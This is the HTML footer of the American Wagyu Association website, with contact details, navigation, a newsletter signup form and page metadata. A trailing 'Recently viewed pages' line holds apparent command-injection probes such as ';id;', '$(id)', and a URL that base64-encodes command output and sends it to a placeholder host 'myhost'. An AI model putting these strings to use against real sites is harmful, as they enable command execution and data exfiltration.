3.255s3.086-1.442 3.086-3.233m-7.118 0v-.022c0-2.174 1.633-4.078 4.032-4.078s4.01 1.881 4.01 4.055v.023c0 2.173-1.634 4.077-4.033 4.077-2.398 0-4.009-1.881-4.009-4.055m9.925-3.965h.833l4.967 6.319v-6.319h.867v7.884h-.71l-5.09-6.465v6.465h-.867zM15.032 46.452c2.036-5.17 5.678-2.612 5.678-2.612 9.666 7.315 7.057 38.83 7.057 38.83l15.815-37.652h.98l12.99 37.652L71.93 45.018h1.085l-14.92 39.063h-1.03L44.073 46.429 28.2 84.08h-1.084c.761-39.82-8.614-39.211-8.614-39.211-1.583-.183-3.47 1.582-3.47 1.582"/><path d="M18.521 45.887c-.717-.24-1.889.417-2.794 1.309l-3.02 3.141 1.377-4.259c1.266-3.214 3.183-3.89 4.568-3.89 1.438 0 2.525.735 2.644.819 7.488 5.666 8.028 24.306 7.776 33.928L42.905 44h2.382l12.314 35.688L71.23 44h3.264L58.796 85.1h-2.458l-12.36-35.824L28.876 85.1h-2.798l.02-1.039c.716-37.464-7.493-38.17-7.577-38.174M12.16 14.282s-.936.263-3.104 1.282c0 0-7.662-4.717-2.693-15.417 0 0-1.589 8.274 5.796 14.135m12.153 5.206s-.354.406-1.943 2.95c0 0 9.63 3.008 18.176-1.834 0 0-12.804 1.71-16.233-1.116" fill="#FEFEFE" mask="url(#b)"/><path d="M48.194 26.188s-7.164 13.689 24.36.777c0 0 23.798-9.443 35.28.176-1.32-1.106 16.913 12.568-7.758 33.67 0 0 16.137-17.998 6.514-29.23 0 0-6.589-10.604-32.453-1.85 0 0-18.34 8.094-27.65 5.145 0 0-8.378-3.723 1.707-8.688" fill="#FEFEFE" mask="url(#b)"/><path fill="#FEFEFE" mask="url(#b)" d="M99.488 68.78L88.907 45.995 78.383 68.78l-.38.813-6.729 14.487h-1.14l18.013-39.063h1.519L107.68 84.08h-1.194l-6.674-14.487z"/><path fill="#FEFEFE" mask="url(#b)" d="M89.104 44h1.214l18.954 41.1h-3.438l-6.947-15.08-.345-.862-9.633-20.74-9.983 21.607L71.924 85.1h-3.38L87.496 44h1.21m49.737 21.56h5.773v13.963c-1.883 1.593-4.029 2.821-6.44 3.69-2.408.868-4.971 1.301-7.69 1.301-3.077 0-5.922-.533-8.53-1.6-2.607-1.067-4.854-2.576-6.738-4.53a20.293 20.293 0 01-4.182-6.24c-1.015-2.35-1.52-4.882-1.52-7.595 0-2.821.54-5.443 1.626-7.867a19.997 19.997 0 014.422-6.32c1.86-1.791 4.067-3.201 6.617-4.233 2.551-1.03 5.29-1.546 8.22-1.546 2.604 0 5.064.408 7.38 1.221a22.49 22.49 0 016.29 3.391l-.16 1.085a19.903 19.903 0 00-6.103-3.5c-2.261-.812-4.694-1.22-7.299-1.22-2.784 0-5.39.488-7.812 1.465-2.423.976-4.53 2.325-6.321 4.042a19.027 19.027 0 00-4.231 6.048c-1.03 2.316-1.547 4.811-1.547 7.488 0 2.677.506 5.174 1.52 7.486a18.356 18.356 0 004.205 6.023c1.79 1.701 3.896 3.04 6.32 4.016 2.422.976 5.028 1.465 7.813 1.465 2.529 0 4.91-.408 7.135-1.22 2.223-.816 4.203-1.962 5.94-3.446V66.618h-4.688"/><path d="M130.086 85.533c-3.2 0-6.199-.564-8.916-1.676-2.727-1.117-5.112-2.72-7.085-4.766a21.38 21.38 0 01-4.383-6.543c-1.066-2.463-1.605-5.155-1.605-8 0-2.956.577-5.743 1.716-8.283a21.083 21.083 0 014.645-6.637c1.945-1.872 4.28-3.366 6.941-4.443 2.661-1.075 5.555-1.62 8.602-1.62 2.706 0 5.303.43 7.717 1.278a23.616 23.616 0 016.575 3.545l.474.364-.514 3.479-1.396-1.17a19.01 19.01 0 00-5.795-3.322c-2.142-.77-4.481-1.16-6.953-1.16-2.642 0-5.142.467-7.43 1.39-2.291.924-4.308 2.213-5.998 3.833a18.096 18.096 0 00-4.007 5.729c-.966 2.175-1.457 4.555-1.457 7.072 0 2.526.483 4.908 1.434 7.078a17.435 17.435 0 003.973 5.693c1.69 1.605 3.708 2.886 6 3.81 2.291.922 4.791 1.39 7.432 1.39 2.399 0 4.682-.39 6.786-1.159a18.422 18.422 0 005.27-2.966V67.637h-3.668V64.54h6.79v15.455l-.36.305c-1.966 1.662-4.238 2.964-6.754 3.87-2.505.904-5.209 1.362-8.034 1.362m33.811-22.882v21.43h-1.083V62.65l-14.65-17.632h1.302l13.888 16.71 13.943-16.71h1.25z" fill="#FEFEFE" mask="url(#b)"/><path fill="#FEFEFE" mask="url(#b)" d="M164.916 85.1h-3.12V63.017l-15.803-19.019h3.95l13.414 16.137L176.82 44h3.897l-15.801 19.019zm52.439-9.944a14.992 14.992 0 01-3.234 4.8c-1.45 1.411-3.17 2.524-5.163 3.337-1.992.816-4.131 1.221-6.414 1.221-2.39 0-4.59-.424-6.603-1.274a15.922 15.922 0 01-5.244-3.553 15.46 15.46 0 01-3.07-4.72c-.745-1.773-1.115-3.69-1.115-5.753V45.018h1.088v24.196c0 2.026.387 3.917 1.166 5.671a14.19 14.19 0 003.173 4.557c1.337 1.284 2.91 2.297 4.72 3.038 1.808.742 3.761 1.113 5.859 1.113 2.096 0 4.059-.371 5.887-1.113 1.827-.74 3.408-1.754 4.747-3.038a13.874 13.874 0 003.145-4.557c.762-1.754 1.142-3.645 1.142-5.67V45.017h1.084v24.196c0 2.136-.39 4.116-1.168 5.942"/><path d="M202.544 85.533c-2.515 0-4.87-.456-7-1.355a16.978 16.978 0 01-5.576-3.78 16.596 16.596 0 01-3.281-5.04c-.792-1.884-1.193-3.953-1.193-6.144V44h3.124v25.214c0 1.876.362 3.646 1.078 5.257a13.25 13.25 0 002.948 4.236c1.24 1.19 2.72 2.144 4.4 2.83 1.678.689 3.519 1.038 5.474 1.038 1.954 0 3.806-.35 5.505-1.04 1.695-.686 3.184-1.638 4.423-2.828a12.921 12.921 0 002.916-4.226c.703-1.616 1.059-3.388 1.059-5.267V44h3.12v25.214c0 2.26-.42 4.394-1.25 6.34a16.08 16.08 0 01-3.452 5.125c-1.549 1.506-3.396 2.7-5.496 3.557-2.104.86-4.39 1.297-6.799 1.297M91.547 70.776a2.802 2.802 0 11-5.603 0 2.802 2.802 0 015.603 0" fill="#FEFEFE" mask="url(#b)"/><path d="M88.746 68.993c-.983 0-1.782.8-1.782 1.783 0 .983.8 1.783 1.782 1.783.983 0 1.783-.8 1.783-1.783 0-.983-.8-1.783-1.783-1.783m0 5.603a3.823 3.823 0 01-3.819-3.82 3.824 3.824 0 013.82-3.82 3.824 3.824 0 013.819 3.82 3.823 3.823 0 01-3.82 3.82M10.779 16.645s-5.457.557-6.793 5.235c0 0-1.282 3.898.5 6.626 0 0 .613.668-.11 2.228 0 0-7.463 14.256-2.897 17.82 0 0 5.847 5.178 14.368-7.908 0 0-7.908 8.465-12.641 5.513 0 0-3.286-.835 3.118-13.254 0 0 2.45-4.565 0-6.849 0 0-3.063-3.286 4.455-9.41" fill="#FEFEFE" mask="url(#b)"/></g></g></svg>
						<div class="social-icons">
															<a class="social-icon" href="https://www.instagram.com/americanwagyu/" target="_blank">
									<img src="/dist/svgs/brands/instagram.svg" alt="instagram"/>
								</a>
															<a class="social-icon" href="https://www.facebook.com/Wagyu.org" target="_blank">
									<img src="/dist/svgs/brands/facebook.svg" alt="facebook"/>
								</a>
													</div>
					</div>
					<div class="global-info">
						<div>
							<p>Physical Address:</p>
							<p>958 S Lochsa St, Suite 120</p>
							<p>Post Falls, ID
							83854</p>
							<p>(UPS, FedEx Deliveries)</p>
							<br />
							<p>Mailing Address:</p>
							<p>PO Box 1115</p>
							<p>Post Falls, 
								ID 
								83877
							</p>
							<p>(USPS Deliveries)</p>
							<p class="email"><a href="office@wagyu.org">office@wagyu.org</a></p>
							<p class="phone"><a href="tel:+1 (208) 262-8100">+1 (208) 262-8100</a></p>
						</div>
					</div>
					<div class="pages">
						<ul>
																								<li><a href="/for-consumers">Consumers</a></li>
																																<li><a href="/for-producers">Programs</a></li>
																																<li><a href="/for-members">Member Tools/ Resources</a></li>
																																<li><a href="/for-juniors">Juniors</a></li>
																																<li><a href="/company">About</a></li>
																																<li><a href="https://worldwagyucouncil.com/" target="_blank">World Wagyu Council</a></li>
																																<li><a href="/events">Events</a></li>
																																<li><a href="/news">News/Promotion</a></li>
																																<li><a href="/news/wagyu-world">Wagyu World</a></li>
																																<li><a href="/contact">Contact</a></li>
																																<li><a href="/member-sign-in">Members Only</a></li>
																					</ul>
					</div>
					<div class="email-sign-up">
						<p>Sign up and receive news, events, and other helpful resources.</p>
												<div class="footer-form" aria-label="Footer Email Signup Form" role="img">
							
<form method="post" data-recaptcha="v2_checkbox" data-recaptcha-key="6LcmwTEkAAAAAGXbkTvxyv3boR58sLswUB6-ILcj" data-recaptcha-lazy-load data-freeform data-id="50e888-form-RPq1xP1ZM-xYBpE5pgE-FhpcdLDa8RciuHFf3C1aenSmkXMANH2J0i5PLjFl" data-handle="footerEmailSignup" data-disable-submit data-show-spinner data-auto-scroll data-success-message="Form has been submitted successfully!" data-error-message="Sorry, there was an error submitting the form. Please try again." >
<div class="freeform_form_handle" style="position: absolute !important; width: 0 !important; height: 0 !important; overflow: hidden !important;" aria-hidden="true" tabindex="-1"><label aria-hidden="true" tabindex="-1" for="freeform_form_handle">Leave this field blank</label><input type="text" value="" name="freeform_form_handle" id="freeform_form_handle" aria-hidden="true" autocomplete="off" tabindex="-1" /></div><input type="hidden" name="freeform_payload" value="UG/t0ZvJ+TPyzCiCt5j+4mI0NzEyNDRjNjhkYmY4NDUyM2M4OWFlNmU1NWExNGU0MTRhMzc5ZWFlNTkwZDU4NWJmMDQ5ZWU3ZTk5YTExMzjTjcFnlcV1Gornx+EnKNV0yKsqbrbmcoYBdkcCfVE7QbFNNCParj9negmdKwTtG6d9GPf+mV3NhYbGHeP4LHxZYAn/9E9NVmEkb/pATdT4MXNgV925wSWvdvIsIHd25oqLlLCZrGpNeUVqeTK9dhrJPWHfHAMXir8dbYhv42OLeDFUY1n00Y8Qh7MO05zGtlxt35E+6DLlvAet0NE/YkC6jjtf3G9bO0sT19Gl5WdxCWRnmR7IjqWd4/4RyJTse/BwtzXnTZubv0y5ZFasllaPOhczf7xA1n9/dYmOxp49uKvq7QNwYylcMoNxuUxDBm+xCS3MkwROnoWFFMqyYXsC/VkZsZIjxg/FV1wDRJ3mdQ==" />
<input type="hidden" name="formHash" value="RPq1xP1ZM-xYBpE5pgE-FhpcdLDa8RciuHFf3C1aenSmkXMANH2J0i5PLjFl" />
<input type="hidden" name="action" value="freeform/submit" />
<input type="hidden" name="CRAFT_CSRF_TOKEN" value="HIvMnbWlemJS16Nc41ssY1ZlAB3Sb0A-Jj56_Iw1zyusblWTkYchgSnK-siF8QxSM4foG7sqTjkOLkxvnzo0cFdcLrfcUp8SxQoFzOP0RvU=" />
<input type="hidden" name="freeform-action" value="submit" />
<div id="50e888-form-RPq1xP1ZM-xYBpE5pgE-FhpcdLDa8RciuHFf3C1aenSmkXMANH2J0i5PLjFl" data-scroll-anchor style="display: none;"></div>

<script>
 var form = document.querySelector('[data-id="50e888-form-RPq1xP1ZM-xYBpE5pgE-FhpcdLDa8RciuHFf3C1aenSmkXMANH2J0i5PLjFl"]');
 if (form) {
 form.addEventListener("freeform-stripe-styling", function (event) {
 event.detail.base = {
 fontSize: "16px",
 fontFamily: "-apple-system,BlinkMacSystemFont,\"Segoe UI\",Roboto,\"Helvetica Neue\",Arial,sans-serif,\"Apple Color Emoji\",\"Segoe UI Emoji\",\"Segoe UI Symbol\",\"Noto Color Emoji\"",
 }
 })
 }
</script>




<div class="freeform-row ">
 <div class="freeform-column ">
 <label for="form-input-email" class="freeform-label freeform-required">Email</label>
<input class="freeform-input" name="email" type="email" id="form-input-email" placeholder="Enter Email Address" data-required/>

 
 </div>
 </div>
<div class="freeform-row ">
 <div class="freeform-column ">
 <div class="g-recaptcha" data-sitekey="6LcmwTEkAAAAAGXbkTvxyv3boR58sLswUB6-ILcj" data-theme="light" data-size="normal" ></div><input type="hidden" name="grecaptcha_pb6gdboxM" />

 
 </div>
 </div>
<div class="freeform-row ">
 <div class="freeform-column freeform-column-content-align-left">
 <button class data-freeform-action="submit" type="submit" name="form_page_submit">Submit</button>

 
 </div>
 </div>

</form>

						</div>
					</div>
				</div>
				<div class="copyright">Terms of Use | Copyright 2025. American Wagyu Association</div>
			</footer>
		
		<div id="loading-overlay">
	<div>
		<svg class="spinner" width="65px" height="65px" viewBox="0 0 66 66" preserveAspectRatio="xMinYMin meet" xmlns="http://www.w3.org/2000/svg" aria-hidden="true">
			<circle class="path" fill="none" stroke-width="6" stroke-linecap="round" cx="33" cy="33" r="30"></circle>
		</svg>
	</div>
</div>

		<script src="/dist/js/app.js?id=4ce5e973492c9b703107"></script>
		<script>
			const date = new Date();
			date.setTime(date.getTime() + (30 * 24 * 60 * 60 * 1000));
			let expires = "; expires=" + date.toGMTString();

			function showEmailPopup(event) {
				var hasCookie = document.cookie.indexOf("emailPopup");
				var emailPopup = document.getElementById("email-popup");
				if (emailPopup) {
					if (hasCookie == -1) {
						emailPopup.style.display = "block";
						document.cookie = "emailPopup=hasBeenSeen" + expires + "; path=/";
					} else {
						emailPopup.style.display = "none";
					}
				}
			}
		</script>
		
	<script type="application/ld+json">{"@context":"http://schema.org","@graph":[{"@type":"WebPage","author":{"@id":"#identity"},"copyrightHolder":{"@id":"#identity"},"copyrightYear":"2019","creator":{"@id":"#creator"},"dateModified":"2025-05-07T13:49:38-06:00","datePublished":"2019-09-12T06:39:00-06:00","description":"The best beef is the marbled beef of a wagyu cow. We have everything you need to buy, produce, and promote American Wagyu beef.","headline":"The Finest Beef in the US","image":{"@type":"ImageObject","url":"https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Pages/Home/_1200x630_crop_center-center_82_none/wagyu-beef.jpg?mtime=1624647553"},"inLanguage":"en-us","mainEntityOfPage":"https://wagyu.org/","name":"The Finest Beef in the US","publisher":{"@id":"#creator"},"url":"https://wagyu.org"},{"@id":"#identity","@type":"LocalBusiness","priceRange":"$"},{"@id":"https://reusserdesign.com#creator","@type":"LocalBusiness","address":{"@type":"PostalAddress","addressCountry":"US","addressLocality":"Roanoke","addressRegion":"IN","postalCode":"46783","streetAddress":"150 S Main St"},"description":"Specializing in web development, custom UX design, mobile apps, and digital strategy, our northeast Indiana web design agency can assist you with your website design needs, SEO, content strategy, and more.","email":"hello@reusserdesign.com","geo":{"@type":"GeoCoordinates","latitude":"40.960980","longitude":"-85.373530"},"name":"Reusser Design, LLC","priceRange":"$","telephone":"260.676.2261","url":"https://reusserdesign.com"},{"@type":"BreadcrumbList","description":"Breadcrumbs list","itemListElement":[{"@type":"ListItem","item":"https://wagyu.org","name":"Homepage","position":1}],"name":"Breadcrumbs"}]}</script><script src="https://wagyu.org/cpresources/a4d9ce65/js/superagent.js?v=1677607016"></script>
<script src="https://wagyu.org/cpresources/a4d9ce65/js/aw.js?v=1677607016"></script>
<script>window.csrfTokenName = "CRAFT_CSRF_TOKEN";
window.csrfTokenValue = "HIvMnbWlemJS16Nc41ssY1ZlAB3Sb0A-Jj56_Iw1zyusblWTkYchgSnK-siF8QxSM4foG7sqTjkOLkxvnzo0cFdcLrfcUp8SxQoFzOP0RvU=";</script></body>
</html>
 Recently viewed pages: https://karpolan.com/services/ https://;|id; https://;id; https://;$(id); http://myhost/$("$id_output" | base64)"' http://myhost/$(echo -n "$id_output" | base64)"' https://www.google.com/$($(id))" https://www.google.com/$(id)" https://www.google.com/$(id) https://www.google.com/